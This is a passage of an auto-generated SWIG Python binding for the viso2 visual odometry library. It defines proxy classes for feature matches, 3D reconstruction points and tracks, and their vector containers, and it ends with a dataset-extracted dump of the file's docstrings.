__swig_getmethods__["refinement"] = _viso2.Matcher_parameters_refinement_get
if _newclass:
refinement = _swig_property(_viso2.Matcher_parameters_refinement_get, _viso2.Matcher_parameters_refinement_set)
__swig_setmethods__["f"] = _viso2.Matcher_parameters_f_set
__swig_getmethods__["f"] = _viso2.Matcher_parameters_f_get
if _newclass:
f = _swig_property(_viso2.Matcher_parameters_f_get, _viso2.Matcher_parameters_f_set)
__swig_setmethods__["cu"] = _viso2.Matcher_parameters_cu_set
__swig_getmethods__["cu"] = _viso2.Matcher_parameters_cu_get
if _newclass:
cu = _swig_property(_viso2.Matcher_parameters_cu_get, _viso2.Matcher_parameters_cu_set)
__swig_setmethods__["cv"] = _viso2.Matcher_parameters_cv_set
__swig_getmethods__["cv"] = _viso2.Matcher_parameters_cv_get
if _newclass:
cv = _swig_property(_viso2.Matcher_parameters_cv_get, _viso2.Matcher_parameters_cv_set)
__swig_setmethods__["base"] = _viso2.Matcher_parameters_base_set
__swig_getmethods__["base"] = _viso2.Matcher_parameters_base_get
if _newclass:
base = _swig_property(_viso2.Matcher_parameters_base_get, _viso2.Matcher_parameters_base_set)
def __init__(self):
"""__init__(self) -> Matcher_parameters"""
this = _viso2.new_Matcher_parameters()
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_Matcher_parameters
__del__ = lambda self: None
Matcher_parameters_swigregister = _viso2.Matcher_parameters_swigregister
Matcher_parameters_swigregister(Matcher_parameters)
class p_match(_object):
"""Proxy of C++ Matcher::p_match class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, p_match, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, p_match, name)
__repr__ = _swig_repr
__swig_setmethods__["u1p"] = _viso2.p_match_u1p_set
__swig_getmethods__["u1p"] = _viso2.p_match_u1p_get
if _newclass:
u1p = _swig_property(_viso2.p_match_u1p_get, _viso2.p_match_u1p_set)
__swig_setmethods__["v1p"] = _viso2.p_match_v1p_set
__swig_getmethods__["v1p"] = _viso2.p_match_v1p_get
if _newclass:
v1p = _swig_property(_viso2.p_match_v1p_get, _viso2.p_match_v1p_set)
__swig_setmethods__["i1p"] = _viso2.p_match_i1p_set
__swig_getmethods__["i1p"] = _viso2.p_match_i1p_get
if _newclass:
i1p = _swig_property(_viso2.p_match_i1p_get, _viso2.p_match_i1p_set)
__swig_setmethods__["u2p"] = _viso2.p_match_u2p_set
__swig_getmethods__["u2p"] = _viso2.p_match_u2p_get
if _newclass:
u2p = _swig_property(_viso2.p_match_u2p_get, _viso2.p_match_u2p_set)
__swig_setmethods__["v2p"] = _viso2.p_match_v2p_set
__swig_getmethods__["v2p"] = _viso2.p_match_v2p_get
if _newclass:
v2p = _swig_property(_viso2.p_match_v2p_get, _viso2.p_match_v2p_set)
__swig_setmethods__["i2p"] = _viso2.p_match_i2p_set
__swig_getmethods__["i2p"] = _viso2.p_match_i2p_get
if _newclass:
i2p = _swig_property(_viso2.p_match_i2p_get, _viso2.p_match_i2p_set)
__swig_setmethods__["u1c"] = _viso2.p_match_u1c_set
__swig_getmethods__["u1c"] = _viso2.p_match_u1c_get
if _newclass:
u1c = _swig_property(_viso2.p_match_u1c_get, _viso2.p_match_u1c_set)
__swig_setmethods__["v1c"] = _viso2.p_match_v1c_set
__swig_getmethods__["v1c"] = _viso2.p_match_v1c_get
if _newclass:
v1c = _swig_property(_viso2.p_match_v1c_get, _viso2.p_match_v1c_set)
__swig_setmethods__["i1c"] = _viso2.p_match_i1c_set
__swig_getmethods__["i1c"] = _viso2.p_match_i1c_get
if _newclass:
i1c = _swig_property(_viso2.p_match_i1c_get, _viso2.p_match_i1c_set)
__swig_setmethods__["u2c"] = _viso2.p_match_u2c_set
__swig_getmethods__["u2c"] = _viso2.p_match_u2c_get
if _newclass:
u2c = _swig_property(_viso2.p_match_u2c_get, _viso2.p_match_u2c_set)
__swig_setmethods__["v2c"] = _viso2.p_match_v2c_set
__swig_getmethods__["v2c"] = _viso2.p_match_v2c_get
if _newclass:
v2c = _swig_property(_viso2.p_match_v2c_get, _viso2.p_match_v2c_set)
__swig_setmethods__["i2c"] = _viso2.p_match_i2c_set
__swig_getmethods__["i2c"] = _viso2.p_match_i2c_get
if _newclass:
i2c = _swig_property(_viso2.p_match_i2c_get, _viso2.p_match_i2c_set)
def __init__(self, *args):
"""
__init__(self) -> p_match
__init__(self, u1p, v1p, i1p, u2p, v2p, i2p, u1c, v1c, i1c, u2c, v2c, i2c) -> p_match
"""
this = _viso2.new_p_match(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_p_match
__del__ = lambda self: None
p_match_swigregister = _viso2.p_match_swigregister
p_match_swigregister(p_match)
class Reconstruction(_object):
"""Proxy of C++ Reconstruction class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, Reconstruction, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, Reconstruction, name)
__repr__ = _swig_repr
def __init__(self):
"""__init__(self) -> Reconstruction"""
this = _viso2.new_Reconstruction()
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_Reconstruction
__del__ = lambda self: None
def setCalibration(self, f, cu, cv):
"""setCalibration(self, f, cu, cv)"""
return _viso2.Reconstruction_setCalibration(self, f, cu, cv)
def update(self, p_matched, Tr, point_type=1, min_track_length=2, max_dist=30, min_angle=2):
"""
update(self, p_matched, Tr, point_type=1, min_track_length=2, max_dist=30, min_angle=2)
update(self, p_matched, Tr, point_type=1, min_track_length=2, max_dist=30)
update(self, p_matched, Tr, point_type=1, min_track_length=2)
update(self, p_matched, Tr, point_type=1)
update(self, p_matched, Tr)
"""
return _viso2.Reconstruction_update(self, p_matched, Tr, point_type, min_track_length, max_dist, min_angle)
def getPoints(self):
"""getPoints(self) -> Point3dVector"""
return _viso2.Reconstruction_getPoints(self)
def getTracks(self):
"""getTracks(self) -> TrackVector"""
return _viso2.Reconstruction_getTracks(self)
Reconstruction_swigregister = _viso2.Reconstruction_swigregister
Reconstruction_swigregister(Reconstruction)
class point3d(_object):
"""Proxy of C++ Reconstruction::point3d class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, point3d, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, point3d, name)
__repr__ = _swig_repr
__swig_setmethods__["x"] = _viso2.point3d_x_set
__swig_getmethods__["x"] = _viso2.point3d_x_get
if _newclass:
x = _swig_property(_viso2.point3d_x_get, _viso2.point3d_x_set)
__swig_setmethods__["y"] = _viso2.point3d_y_set
__swig_getmethods__["y"] = _viso2.point3d_y_get
if _newclass:
y = _swig_property(_viso2.point3d_y_get, _viso2.point3d_y_set)
__swig_setmethods__["z"] = _viso2.point3d_z_set
__swig_getmethods__["z"] = _viso2.point3d_z_get
if _newclass:
z = _swig_property(_viso2.point3d_z_get, _viso2.point3d_z_set)
def __init__(self, *args):
"""
__init__(self) -> point3d
__init__(self, x, y, z) -> point3d
"""
this = _viso2.new_point3d(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_point3d
__del__ = lambda self: None
point3d_swigregister = _viso2.point3d_swigregister
point3d_swigregister(point3d)
class point2d(_object):
"""Proxy of C++ Reconstruction::point2d class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, point2d, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, point2d, name)
__repr__ = _swig_repr
__swig_setmethods__["u"] = _viso2.point2d_u_set
__swig_getmethods__["u"] = _viso2.point2d_u_get
if _newclass:
u = _swig_property(_viso2.point2d_u_get, _viso2.point2d_u_set)
__swig_setmethods__["v"] = _viso2.point2d_v_set
__swig_getmethods__["v"] = _viso2.point2d_v_get
if _newclass:
v = _swig_property(_viso2.point2d_v_get, _viso2.point2d_v_set)
def __init__(self, *args):
"""
__init__(self) -> point2d
__init__(self, u, v) -> point2d
"""
this = _viso2.new_point2d(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_point2d
__del__ = lambda self: None
point2d_swigregister = _viso2.point2d_swigregister
point2d_swigregister(point2d)
class track(_object):
"""Proxy of C++ Reconstruction::track class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, track, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, track, name)
__repr__ = _swig_repr
__swig_setmethods__["pixels"] = _viso2.track_pixels_set
__swig_getmethods__["pixels"] = _viso2.track_pixels_get
if _newclass:
pixels = _swig_property(_viso2.track_pixels_get, _viso2.track_pixels_set)
__swig_setmethods__["pt"] = _viso2.track_pt_set
__swig_getmethods__["pt"] = _viso2.track_pt_get
if _newclass:
pt = _swig_property(_viso2.track_pt_get, _viso2.track_pt_set)
__swig_setmethods__["valid"] = _viso2.track_valid_set
__swig_getmethods__["valid"] = _viso2.track_valid_get
if _newclass:
valid = _swig_property(_viso2.track_valid_get, _viso2.track_valid_set)
__swig_setmethods__["first_frame"] = _viso2.track_first_frame_set
__swig_getmethods__["first_frame"] = _viso2.track_first_frame_get
if _newclass:
first_frame = _swig_property(_viso2.track_first_frame_get, _viso2.track_first_frame_set)
__swig_setmethods__["last_frame"] = _viso2.track_last_frame_set
__swig_getmethods__["last_frame"] = _viso2.track_last_frame_get
if _newclass:
last_frame = _swig_property(_viso2.track_last_frame_get, _viso2.track_last_frame_set)
__swig_setmethods__["last_idx"] = _viso2.track_last_idx_set
__swig_getmethods__["last_idx"] = _viso2.track_last_idx_get
if _newclass:
last_idx = _swig_property(_viso2.track_last_idx_get, _viso2.track_last_idx_set)
def __init__(self):
"""__init__(self) -> track"""
this = _viso2.new_track()
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_track
__del__ = lambda self: None
track_swigregister = _viso2.track_swigregister
track_swigregister(track)
class MatchVector(_object):
"""Proxy of C++ std::vector<(Matcher::p_match)> class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, MatchVector, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, MatchVector, name)
__repr__ = _swig_repr
def iterator(self):
"""iterator(self) -> SwigPyIterator"""
return _viso2.MatchVector_iterator(self)
def __iter__(self):
return self.iterator()
def __nonzero__(self):
"""__nonzero__(self) -> bool"""
return _viso2.MatchVector___nonzero__(self)
def __bool__(self):
"""__bool__(self) -> bool"""
return _viso2.MatchVector___bool__(self)
def __len__(self):
"""__len__(self) -> std::vector< Matcher::p_match >::size_type"""
return _viso2.MatchVector___len__(self)
def __getslice__(self, i, j):
"""__getslice__(self, i, j) -> MatchVector"""
return _viso2.MatchVector___getslice__(self, i, j)
def __setslice__(self, *args):
"""
__setslice__(self, i, j)
__setslice__(self, i, j, v)
"""
return _viso2.MatchVector___setslice__(self, *args)
def __delslice__(self, i, j):
"""__delslice__(self, i, j)"""
return _viso2.MatchVector___delslice__(self, i, j)
def __delitem__(self, *args):
"""
__delitem__(self, i)
__delitem__(self, slice)
"""
return _viso2.MatchVector___delitem__(self, *args)
def __getitem__(self, *args):
"""
__getitem__(self, slice) -> MatchVector
__getitem__(self, i) -> p_match
"""
return _viso2.MatchVector___getitem__(self, *args)
def __setitem__(self, *args):
"""
__setitem__(self, slice, v)
__setitem__(self, slice)
__setitem__(self, i, x)
"""
return _viso2.MatchVector___setitem__(self, *args)
def pop(self):
"""pop(self) -> p_match"""
return _viso2.MatchVector_pop(self)
def append(self, x):
"""append(self, x)"""
return _viso2.MatchVector_append(self, x)
def empty(self):
"""empty(self) -> bool"""
return _viso2.MatchVector_empty(self)
def size(self):
"""size(self) -> std::vector< Matcher::p_match >::size_type"""
return _viso2.MatchVector_size(self)
def swap(self, v):
"""swap(self, v)"""
return _viso2.MatchVector_swap(self, v)
def begin(self):
"""begin(self) -> std::vector< Matcher::p_match >::iterator"""
return _viso2.MatchVector_begin(self)
def end(self):
"""end(self) -> std::vector< Matcher::p_match >::iterator"""
return _viso2.MatchVector_end(self)
def rbegin(self):
"""rbegin(self) -> std::vector< Matcher::p_match >::reverse_iterator"""
return _viso2.MatchVector_rbegin(self)
def rend(self):
"""rend(self) -> std::vector< Matcher::p_match >::reverse_iterator"""
return _viso2.MatchVector_rend(self)
def clear(self):
"""clear(self)"""
return _viso2.MatchVector_clear(self)
def get_allocator(self):
"""get_allocator(self) -> std::vector< Matcher::p_match >::allocator_type"""
return _viso2.MatchVector_get_allocator(self)
def pop_back(self):
"""pop_back(self)"""
return _viso2.MatchVector_pop_back(self)
def erase(self, *args):
"""
erase(self, pos) -> std::vector< Matcher::p_match >::iterator
erase(self, first, last) -> std::vector< Matcher::p_match >::iterator
"""
return _viso2.MatchVector_erase(self, *args)
def __init__(self, *args):
"""
__init__(self) -> MatchVector
__init__(self, arg2) -> MatchVector
__init__(self, size) -> MatchVector
__init__(self, size, value) -> MatchVector
"""
this = _viso2.new_MatchVector(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
def push_back(self, x):
"""push_back(self, x)"""
return _viso2.MatchVector_push_back(self, x)
def front(self):
"""front(self) -> p_match"""
return _viso2.MatchVector_front(self)
def back(self):
"""back(self) -> p_match"""
return _viso2.MatchVector_back(self)
def assign(self, n, x):
"""assign(self, n, x)"""
return _viso2.MatchVector_assign(self, n, x)
def resize(self, *args):
"""
resize(self, new_size)
resize(self, new_size, x)
"""
return _viso2.MatchVector_resize(self, *args)
def insert(self, *args):
"""
insert(self, pos, x) -> std::vector< Matcher::p_match >::iterator
insert(self, pos, n, x)
"""
return _viso2.MatchVector_insert(self, *args)
def reserve(self, n):
"""reserve(self, n)"""
return _viso2.MatchVector_reserve(self, n)
def capacity(self):
"""capacity(self) -> std::vector< Matcher::p_match >::size_type"""
return _viso2.MatchVector_capacity(self)
__swig_destroy__ = _viso2.delete_MatchVector
__del__ = lambda self: None
MatchVector_swigregister = _viso2.MatchVector_swigregister
MatchVector_swigregister(MatchVector)
class Point3dVector(_object):
"""Proxy of C++ std::vector<(Reconstruction::point3d)> class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, Point3dVector, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, Point3dVector, name)
__repr__ = _swig_repr
def iterator(self):
"""iterator(self) -> SwigPyIterator"""
return _viso2.Point3dVector_iterator(self)
def __iter__(self):
return self.iterator()
def __nonzero__(self):
"""__nonzero__(self) -> bool"""
return _viso2.Point3dVector___nonzero__(self)
def __bool__(self):
"""__bool__(self) -> bool"""
return _viso2.Point3dVector___bool__(self)
def __len__(self):
"""__len__(self) -> std::vector< Reconstruction::point3d >::size_type"""
return _viso2.Point3dVector___len__(self)
def __getslice__(self, i, j):
"""__getslice__(self, i, j) -> Point3dVector"""
return _viso2.Point3dVector___getslice__(self, i, j)
def __setslice__(self, *args):
"""
__setslice__(self, i, j)
__setslice__(self, i, j, v)
"""
return _viso2.Point3dVector___setslice__(self, *args)
def __delslice__(self, i, j):
"""__delslice__(self, i, j)"""
return _viso2.Point3dVector___delslice__(self, i, j)
def __delitem__(self, *args):
"""
__delitem__(self, i)
__delitem__(self, slice)
"""
return _viso2.Point3dVector___delitem__(self, *args)
def __getitem__(self, *args):
"""
__getitem__(self, slice) -> Point3dVector
__getitem__(self, i) -> point3d
"""
return _viso2.Point3dVector___getitem__(self, *args)
def __setitem__(self, *args):
"""
__setitem__(self, slice, v)
__setitem__(self, slice)
__setitem__(self, i, x)
"""
return _viso2.Point3dVector___setitem__(self, *args)
def pop(self):
"""pop(self) -> point3d"""
return _viso2.Point3dVector_pop(self)
def append(self, x):
"""append(self, x)"""
return _viso2.Point3dVector_append(self, x)
def empty(self):
"""empty(self) -> bool"""
return _viso2.Point3dVector_empty(self)
def size(self):
"""size(self) -> std::vector< Reconstruction::point3d >::size_type"""
return _viso2.Point3dVector_size(self)
def swap(self, v):
"""swap(self, v)"""
return _viso2.Point3dVector_swap(self, v)
def begin(self):
"""begin(self) -> std::vector< Reconstruction::point3d >::iterator"""
return _viso2.Point3dVector_begin(self)
def end(self):
"""end(self) -> std::vector< Reconstruction::point3d >::iterator"""
return _viso2.Point3dVector_end(self)
def rbegin(self):
"""rbegin(self) -> std::vector< Reconstruction::point3d >::reverse_iterator"""
return _viso2.Point3dVector_rbegin(self)
def rend(self):
"""rend(self) -> std::vector< Reconstruction::point3d >::reverse_iterator"""
return _viso2.Point3dVector_rend(self)
def clear(self):
"""clear(self)"""
return _viso2.Point3dVector_clear(self)
def get_allocator(self):
"""get_allocator(self) -> std::vector< Reconstruction::point3d >::allocator_type"""
return _viso2.Point3dVector_get_allocator(self)
def pop_back(self):
"""pop_back(self)"""
return _viso2.Point3dVector_pop_back(self)
def erase(self, *args):
"""
erase(self, pos) -> std::vector< Reconstruction::point3d >::iterator
erase(self, first, last) -> std::vector< Reconstruction::point3d >::iterator
"""
return _viso2.Point3dVector_erase(self, *args)
def __init__(self, *args):
"""
__init__(self) -> Point3dVector
__init__(self, arg2) -> Point3dVector
__init__(self, size) -> Point3dVector
__init__(self, size, value) -> Point3dVector
"""
this = _viso2.new_Point3dVector(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
def push_back(self, x):
"""push_back(self, x)"""
return _viso2.Point3dVector_push_back(self, x)
def front(self):
"""front(self) -> point3d"""
return _viso2.Point3dVector_front(self)
def back(self):
"""back(self) -> point3d"""
return _viso2.Point3dVector_back(self)
def assign(self, n, x):
"""assign(self, n, x)"""
return _viso2.Point3dVector_assign(self, n, x)
def resize(self, *args):
"""
resize(self, new_size)
resize(self, new_size, x)
"""
return _viso2.Point3dVector_resize(self, *args)
def insert(self, *args):
"""
insert(self, pos, x) -> std::vector< Reconstruction::point3d >::iterator
insert(self, pos, n, x)
"""
return _viso2.Point3dVector_insert(self, *args)
def reserve(self, n):
"""reserve(self, n)"""
return _viso2.Point3dVector_reserve(self, n)
def capacity(self):
"""capacity(self) -> std::vector< Reconstruction::point3d >::size_type"""
return _viso2.Point3dVector_capacity(self)
__swig_destroy__ = _viso2.delete_Point3dVector
__del__ = lambda self: None
Point3dVector_swigregister = _viso2.Point3dVector_swigregister
Point3dVector_swigregister(Point3dVector)
class TrackVector(_object):
"""Proxy of C++ std::vector<(Reconstruction::track)> class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, TrackVector, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, TrackVector, name)
__repr__ = _swig_repr
def iterator(self):
"""iterator(self) -> SwigPyIterator"""
return _viso2.TrackVector_iterator(self)
def __iter__(self):
return self.iterator()
def __nonzero__(self):
"""__nonzero__(self) -> bool"""
return _viso2.TrackVector___nonzero__(self)
def __bool__(self):
"""__bool__(self) -> bool"""
return _viso2.TrackVector___bool__(self)
def __len__(self):
"""__len__(self) -> std::vector< Reconstruction::track >::size_type"""
return _viso2.TrackVector___len__(self)
def __getslice__(self, i, j):
"""__getslice__(self, i, j) -> TrackVector"""
return _viso2.TrackVector___getslice__(self, i, j)
def __setslice__(self, *args):
"""
__setslice__(self, i, j)
__setslice__(self, i, j, v)
"""
return _viso2.TrackVector___setslice__(self, *args)
def __delslice__(self, i, j):
"""__delslice__(self, i, j)"""
return _viso2.TrackVector___delslice__(self, i, j)
def __delitem__(self, *args):
"""
__delitem__(self, i)
__delitem__(self, slice)
"""
return _viso2.TrackVector___delitem__(self, *args)
def __getitem__(self, *args):
"""
__getitem__(self, slice) -> TrackVector
__getitem__(self, i) -> track
"""
return _viso2.TrackVector___getitem__(self, *args)
def __setitem__(self, *args):
"""
__setitem__(self, slice, v)
__setitem__(self, slice)
__setitem__(self, i, x)
"""
return _viso2.TrackVector___setitem__(self, *args)
def pop(self):
"""pop(self) -> track"""
return _viso2.TrackVector_pop(self)
def append(self, x):
"""append(self, x)"""
return _viso2.TrackVector_append(self, x)
def empty(self):
"""empty(self) -> bool"""
return _viso2.TrackVector_empty(self)
def size(self):
"""size(self) -> std::vector< Reconstruction::track >::size_type"""
return _viso2.TrackVector_size(self)
def swap(self, v):
"""swap(self, v)"""
return _viso2.TrackVector_swap(self, v)
def begin(self):
"""begin(self) -> std::vector< Reconstruction::track >::iterator"""
return _viso2.TrackVector_begin(self)
def end(self):
"""end(self) -> std::vector< Reconstruction::track >::iterator"""
return _viso2.TrackVector_end(self)
def rbegin(self):
"""rbegin(self) -> std::vector< Reconstruction::track >::reverse_iterator"""
return _viso2.TrackVector_rbegin(self)
def rend(self):
"""rend(self) -> std::vector< Reconstruction::track >::reverse_iterator"""
return _viso2.TrackVector_rend(self)
def clear(self):
"""clear(self)"""
return _viso2.TrackVector_clear(self)
def get_allocator(self):
"""get_allocator(self) -> std::vector< Reconstruction::track >::allocator_type"""
return _viso2.TrackVector_get_allocator(self)
def pop_back(self):
"""pop_back(self)"""
return _viso2.TrackVector_pop_back(self)
def erase(self, *args):
"""
erase(self, pos) -> std::vector< Reconstruction::track >::iterator
erase(self, first, last) -> std::vector< Reconstruction::track >::iterator
"""
return _viso2.TrackVector_erase(self, *args)
def __init__(self, *args):
"""
__init__(self) -> TrackVector
__init__(self, arg2) -> TrackVector
__init__(self, size) -> TrackVector
__init__(self, size, value) -> TrackVector
"""
this = _viso2.new_TrackVector(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
def push_back(self, x):
"""push_back(self, x)"""
return _viso2.TrackVector_push_back(self, x)
def front(self):
"""front(self) -> track"""
return _viso2.TrackVector_front(self)
def back(self):
"""back(self) -> track"""
return _viso2.TrackVector_back(self)
def assign(self, n, x):
"""assign(self, n, x)"""
return _viso2.TrackVector_assign(self, n, x)
def resize(self, *args):
"""
resize(self, new_size)
resize(self, new_size, x)
"""
return _viso2.TrackVector_resize(self, *args)
def insert(self, *args):
"""
insert(self, pos, x) -> std::vector< Reconstruction::track >::iterator
insert(self, pos, n, x)
"""
return _viso2.TrackVector_insert(self, *args)
def reserve(self, n):
"""reserve(self, n)"""
return _viso2.TrackVector_reserve(self, n)
def capacity(self):
"""capacity(self) -> std::vector< Reconstruction::track >::size_type"""
return _viso2.TrackVector_capacity(self)
__swig_destroy__ = _viso2.delete_TrackVector
__del__ = lambda self: None
TrackVector_swigregister = _viso2.TrackVector_swigregister
TrackVector_swigregister(TrackVector)
# This file is compatible with both classic and new-style classes.
| en | 0.304918 | # This file was automatically generated by SWIG (http://www.swig.org). # Version 3.0.12 # # Do not make changes to this file unless you know what you are doing--modify # the SWIG interface file instead. # Python < 2.2 doesn't have 'property'. Proxy of C++ swig::SwigPyIterator class. value(self) -> PyObject * incr(self, n=1) -> SwigPyIterator incr(self) -> SwigPyIterator decr(self, n=1) -> SwigPyIterator decr(self) -> SwigPyIterator distance(self, x) -> ptrdiff_t equal(self, x) -> bool copy(self) -> SwigPyIterator next(self) -> PyObject * __next__(self) -> PyObject * previous(self) -> PyObject * advance(self, n) -> SwigPyIterator __eq__(self, x) -> bool __ne__(self, x) -> bool __iadd__(self, n) -> SwigPyIterator __isub__(self, n) -> SwigPyIterator __add__(self, n) -> SwigPyIterator __sub__(self, n) -> SwigPyIterator __sub__(self, x) -> ptrdiff_t Proxy of C++ VisualOdometry class. process(self, p_matched_) -> bool getMotion(self) -> Matrix getMatches(self) -> MatchVector getNumberOfMatches(self) -> int32_t getNumberOfInliers(self) -> int32_t getInlierIndices(self) -> std::vector< int32_t,std::allocator< int32_t > > getGain(self, inliers_) -> float Proxy of C++ VisualOdometry::calibration class. __init__(self) -> calibration Proxy of C++ VisualOdometry::bucketing class. __init__(self) -> bucketing Proxy of C++ VisualOdometry::parameters class. __init__(self) -> VO_parameters Proxy of C++ VisualOdometryMono class. __init__(self, param) -> VisualOdometryMono process(self, I, dims, replace=False) -> bool process(self, I, dims) -> bool process(self, I1, I2, dims, replace=False) -> bool process(self, I1, I2, dims) -> bool getInlierMatches(self) -> MatchVector process_frame(self, image1, replace=False) -> bool process_frame(self, image1) -> bool process_frame(self, image1, image2, replace=False) -> bool process_frame(self, image1, image2) -> bool Proxy of C++ VisualOdometryMono::parameters class. __init__(self) -> Mono_parameters Proxy of C++ VisualOdometryStereo class. __init__(self, param) -> VisualOdometryStereo process(self, I1, I2, dims, replace=False) -> bool process(self, I1, I2, dims) -> bool process(self, p_matched_) -> bool process_frame(self, image1, image2, replace=False) -> bool process_frame(self, image1, image2) -> bool Proxy of C++ VisualOdometryStereo::parameters class. __init__(self) -> Stereo_parameters Proxy of C++ Matrix class. __init__(self) -> Matrix __init__(self, m, n) -> Matrix __init__(self, m, n, val_) -> Matrix __init__(self, M) -> Matrix assign(self, M) -> Matrix getData(self, val_, i1=0, j1=0, i2=-1, j2=-1) getData(self, val_, i1=0, j1=0, i2=-1) getData(self, val_, i1=0, j1=0) getData(self, val_, i1=0) getData(self, val_) getMat(self, i1, j1, i2=-1, j2=-1) -> Matrix getMat(self, i1, j1, i2=-1) -> Matrix getMat(self, i1, j1) -> Matrix setMat(self, M, i, j) setVal(self, s, i1=0, j1=0, i2=-1, j2=-1) setVal(self, s, i1=0, j1=0, i2=-1) setVal(self, s, i1=0, j1=0) setVal(self, s, i1=0) setVal(self, s) setDiag(self, s, i1=0, i2=-1) setDiag(self, s, i1=0) setDiag(self, s) zero(self) extractCols(self, idx) -> Matrix eye(m) -> Matrix identity(self) diag(M) -> Matrix reshape(M, m, n) -> Matrix rotMatX(angle) -> Matrix rotMatY(angle) -> Matrix rotMatZ(angle) -> Matrix __add__(self, M) -> Matrix __sub__(self, M) -> Matrix __mul__(self, M) -> Matrix __mul__(self, s) -> Matrix __neg__(self) -> Matrix __invert__(self) -> Matrix l2norm(self) -> FLOAT mean(self) -> FLOAT cross(a, b) -> Matrix inv(M) -> Matrix setInverse(self) -> bool det(self) -> FLOAT solve(self, M, eps=1e-20) -> bool solve(self, M) -> bool lu(self, idx, d, eps=1e-20) -> bool lu(self, idx, d) -> bool svd(self, U, W, V) __str__(self) -> std::string toNumpy(self, mat) Matrix_eye(m) -> Matrix Matrix_diag(M) -> Matrix Matrix_reshape(M, m, n) -> Matrix Matrix_rotMatX(angle) -> Matrix Matrix_rotMatY(angle) -> Matrix Matrix_rotMatZ(angle) -> Matrix Matrix_cross(a, b) -> Matrix Matrix_inv(M) -> Matrix Proxy of C++ Matcher class. __init__(self, param) -> Matcher setIntrinsics(self, f, cu, cv, base) matchFeatures(self, method, Tr_delta=None) matchFeatures(self, method) bucketFeatures(self, max_features, bucket_width, bucket_height) getMatches(self) -> MatchVector getGain(self, inliers) -> float pushBack(self, I1, I2, dims, replace) pushBack(self, I1, dims, replace) pushBack(self, image1, image2, replace=False) pushBack(self, image1, image2) pushBack(self, image1, replace=False) pushBack(self, image1) Proxy of C++ Matcher::parameters class. __init__(self) -> Matcher_parameters Proxy of C++ Matcher::p_match class. __init__(self) -> p_match __init__(self, u1p, v1p, i1p, u2p, v2p, i2p, u1c, v1c, i1c, u2c, v2c, i2c) -> p_match Proxy of C++ Reconstruction class. __init__(self) -> Reconstruction setCalibration(self, f, cu, cv) update(self, p_matched, Tr, point_type=1, min_track_length=2, max_dist=30, min_angle=2) update(self, p_matched, Tr, point_type=1, min_track_length=2, max_dist=30) update(self, p_matched, Tr, point_type=1, min_track_length=2) update(self, p_matched, Tr, point_type=1) update(self, p_matched, Tr) getPoints(self) -> Point3dVector getTracks(self) -> TrackVector Proxy of C++ Reconstruction::point3d class. __init__(self) -> point3d __init__(self, x, y, z) -> point3d Proxy of C++ Reconstruction::point2d class. __init__(self) -> point2d __init__(self, u, v) -> point2d Proxy of C++ Reconstruction::track class. __init__(self) -> track Proxy of C++ std::vector<(Matcher::p_match)> class. iterator(self) -> SwigPyIterator __nonzero__(self) -> bool __bool__(self) -> bool __len__(self) -> std::vector< Matcher::p_match >::size_type __getslice__(self, i, j) -> MatchVector __setslice__(self, i, j) __setslice__(self, i, j, v) __delslice__(self, i, j) __delitem__(self, i) __delitem__(self, slice) __getitem__(self, slice) -> MatchVector __getitem__(self, i) -> p_match __setitem__(self, slice, v) __setitem__(self, slice) __setitem__(self, i, x) pop(self) -> p_match append(self, x) empty(self) -> bool size(self) -> std::vector< Matcher::p_match >::size_type swap(self, v) begin(self) -> std::vector< Matcher::p_match >::iterator end(self) -> std::vector< Matcher::p_match >::iterator rbegin(self) -> std::vector< Matcher::p_match >::reverse_iterator rend(self) -> std::vector< Matcher::p_match >::reverse_iterator clear(self) get_allocator(self) -> std::vector< Matcher::p_match >::allocator_type pop_back(self) erase(self, pos) -> std::vector< Matcher::p_match >::iterator erase(self, first, last) -> std::vector< Matcher::p_match >::iterator __init__(self) -> MatchVector __init__(self, arg2) -> MatchVector __init__(self, size) -> MatchVector __init__(self, size, value) -> MatchVector push_back(self, x) front(self) -> p_match back(self) -> p_match assign(self, n, x) resize(self, new_size) resize(self, new_size, x) insert(self, pos, x) -> std::vector< Matcher::p_match >::iterator insert(self, pos, n, x) reserve(self, n) capacity(self) -> std::vector< Matcher::p_match >::size_type Proxy of C++ std::vector<(Reconstruction::point3d)> class. iterator(self) -> SwigPyIterator __nonzero__(self) -> bool __bool__(self) -> bool __len__(self) -> std::vector< Reconstruction::point3d >::size_type __getslice__(self, i, j) -> Point3dVector __setslice__(self, i, j) __setslice__(self, i, j, v) __delslice__(self, i, j) __delitem__(self, i) __delitem__(self, slice) __getitem__(self, slice) -> Point3dVector __getitem__(self, i) -> point3d __setitem__(self, slice, v) __setitem__(self, slice) __setitem__(self, i, x) pop(self) -> 